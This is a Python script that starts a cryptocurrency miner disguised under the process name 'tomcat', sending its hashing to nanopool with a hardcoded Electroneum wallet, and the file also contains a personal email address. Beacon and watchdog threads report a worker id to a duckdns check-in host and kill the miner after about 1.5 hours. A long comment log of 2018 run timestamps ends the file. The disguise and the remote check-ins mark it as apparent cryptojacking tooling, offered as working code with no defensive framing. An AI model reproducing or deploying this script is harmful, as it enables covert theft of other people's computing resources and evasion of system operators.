import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:39:06.224696
#2018-02-17 17:28:06.407469
#2018-02-17 19:16:07.145384
#2018-02-17 21:07:03.958320
#2018-02-17 22:51:04.521649
#2018-02-18 00:36:02.119655
#2018-02-18 02:26:04.267828
#2018-02-18 04:13:06.333144
#2018-02-18 06:05:05.384412
#2018-02-18 07:55:06.340788
#2018-02-18 09:42:08.066051
#2018-02-18 11:28:04.672767
#2018-02-18 13:14:01.445082
#2018-02-18 15:03:04.715670
#2018-02-18 16:51:05.034287
#2018-02-18 18:39:04.026724
#2018-02-18 20:27:01.864693
#2018-02-18 22:13:02.145735
#2018-02-19 00:02:01.722574
#2018-02-19 01:47:07.067424
#2018-02-19 03:36:07.504858
#2018-02-19 05:21:01.569852
#2018-02-19 07:07:06.931161
#2018-02-19 08:57:06.953274
#2018-02-19 10:47:07.408954
#2018-02-19 12:36:07.848991
#2018-02-19 14:25:10.010131
#2018-02-19 16:13:08.395335
#2018-02-19 17:59:08.155254
#2018-02-19 19:47:07.639210
#2018-02-19 21:36:08.552466
#2018-02-19 23:22:01.970574
#2018-02-20 01:08:07.204936
#2018-02-20 02:57:02.268135
#2018-02-20 04:44:06.560596
#2018-02-20 06:28:08.074686
#2018-02-20 08:13:07.496258
#2018-02-20 09:58:06.565610
#2018-02-20 11:43:08.072528
#2018-02-20 13:31:09.291874
#2018-02-20 15:15:05.951173
#2018-02-20 16:59:10.271368
#2018-02-20 18:47:08.643661
#2018-02-20 20:38:07.920432
#2018-02-20 22:24:07.888801
#2018-02-21 00:06:07.364896
#2018-02-21 01:53:04.456851
#2018-02-21 03:42:07.756483
#2018-02-21 05:30:09.512645
#2018-02-21 07:18:04.144089
#2018-02-21 09:03:06.631460
#2018-02-21 10:53:01.670788
#2018-02-21 12:40:08.284432
#2018-02-21 14:28:04.027645
#2018-02-21 16:16:01.735355
#2018-02-21 18:07:04.390992
#2018-02-21 19:53:01.428166
#2018-02-21 21:39:07.027537
#2018-02-21 23:26:01.669738
#2018-02-22 01:14:04.315140
#2018-02-22 03:03:06.410720
#2018-02-22 04:48:07.366520
#2018-02-22 06:33:03.402341
#2018-02-22 08:21:05.550759
#2018-02-22 10:09:07.507912
#2018-02-22 11:55:09.357154
#2018-02-22 13:39:08.586552
#2018-02-22 15:28:04.702457
#2018-02-22 17:14:02.036159
#2018-02-22 18:59:07.479819
#2018-02-22 20:51:05.186500
#2018-02-22 22:38:07.034684
#2018-02-23 00:24:07.423561
#2018-02-23 02:12:06.119721
#2018-02-23 04:03:03.607210
#2018-02-23 05:48:06.170291
#2018-02-23 07:39:07.236844
#2018-02-23 09:42:08.447811
#2018-02-23 11:46:01.780224
#2018-02-23 13:37:04.943758
#2018-02-23 15:24:09.788986
#2018-02-23 17:11:05.867957
#2018-02-23 18:56:04.722006
#2018-02-23 20:42:08.824519
#2018-02-23 22:29:05.033768
#2018-02-24 00:16:04.943553
#2018-02-24 02:08:04.905132
#2018-02-24 03:58:05.617609
#2018-02-24 05:44:07.285169
#2018-02-24 07:38:05.316081
#2018-02-24 09:24:01.528405
#2018-02-24 11:17:07.173568
#2018-02-24 13:06:07.874259
#2018-02-24 14:57:05.216312
#2018-02-24 16:47:04.719728
#2018-02-24 18:35:01.785578
#2018-02-24 20:23:07.025356
#2018-02-24 22:19:02.131421
#2018-02-25 01:27:06.212272
#2018-02-25 05:12:03.875999
#2018-02-25 10:51:01.528092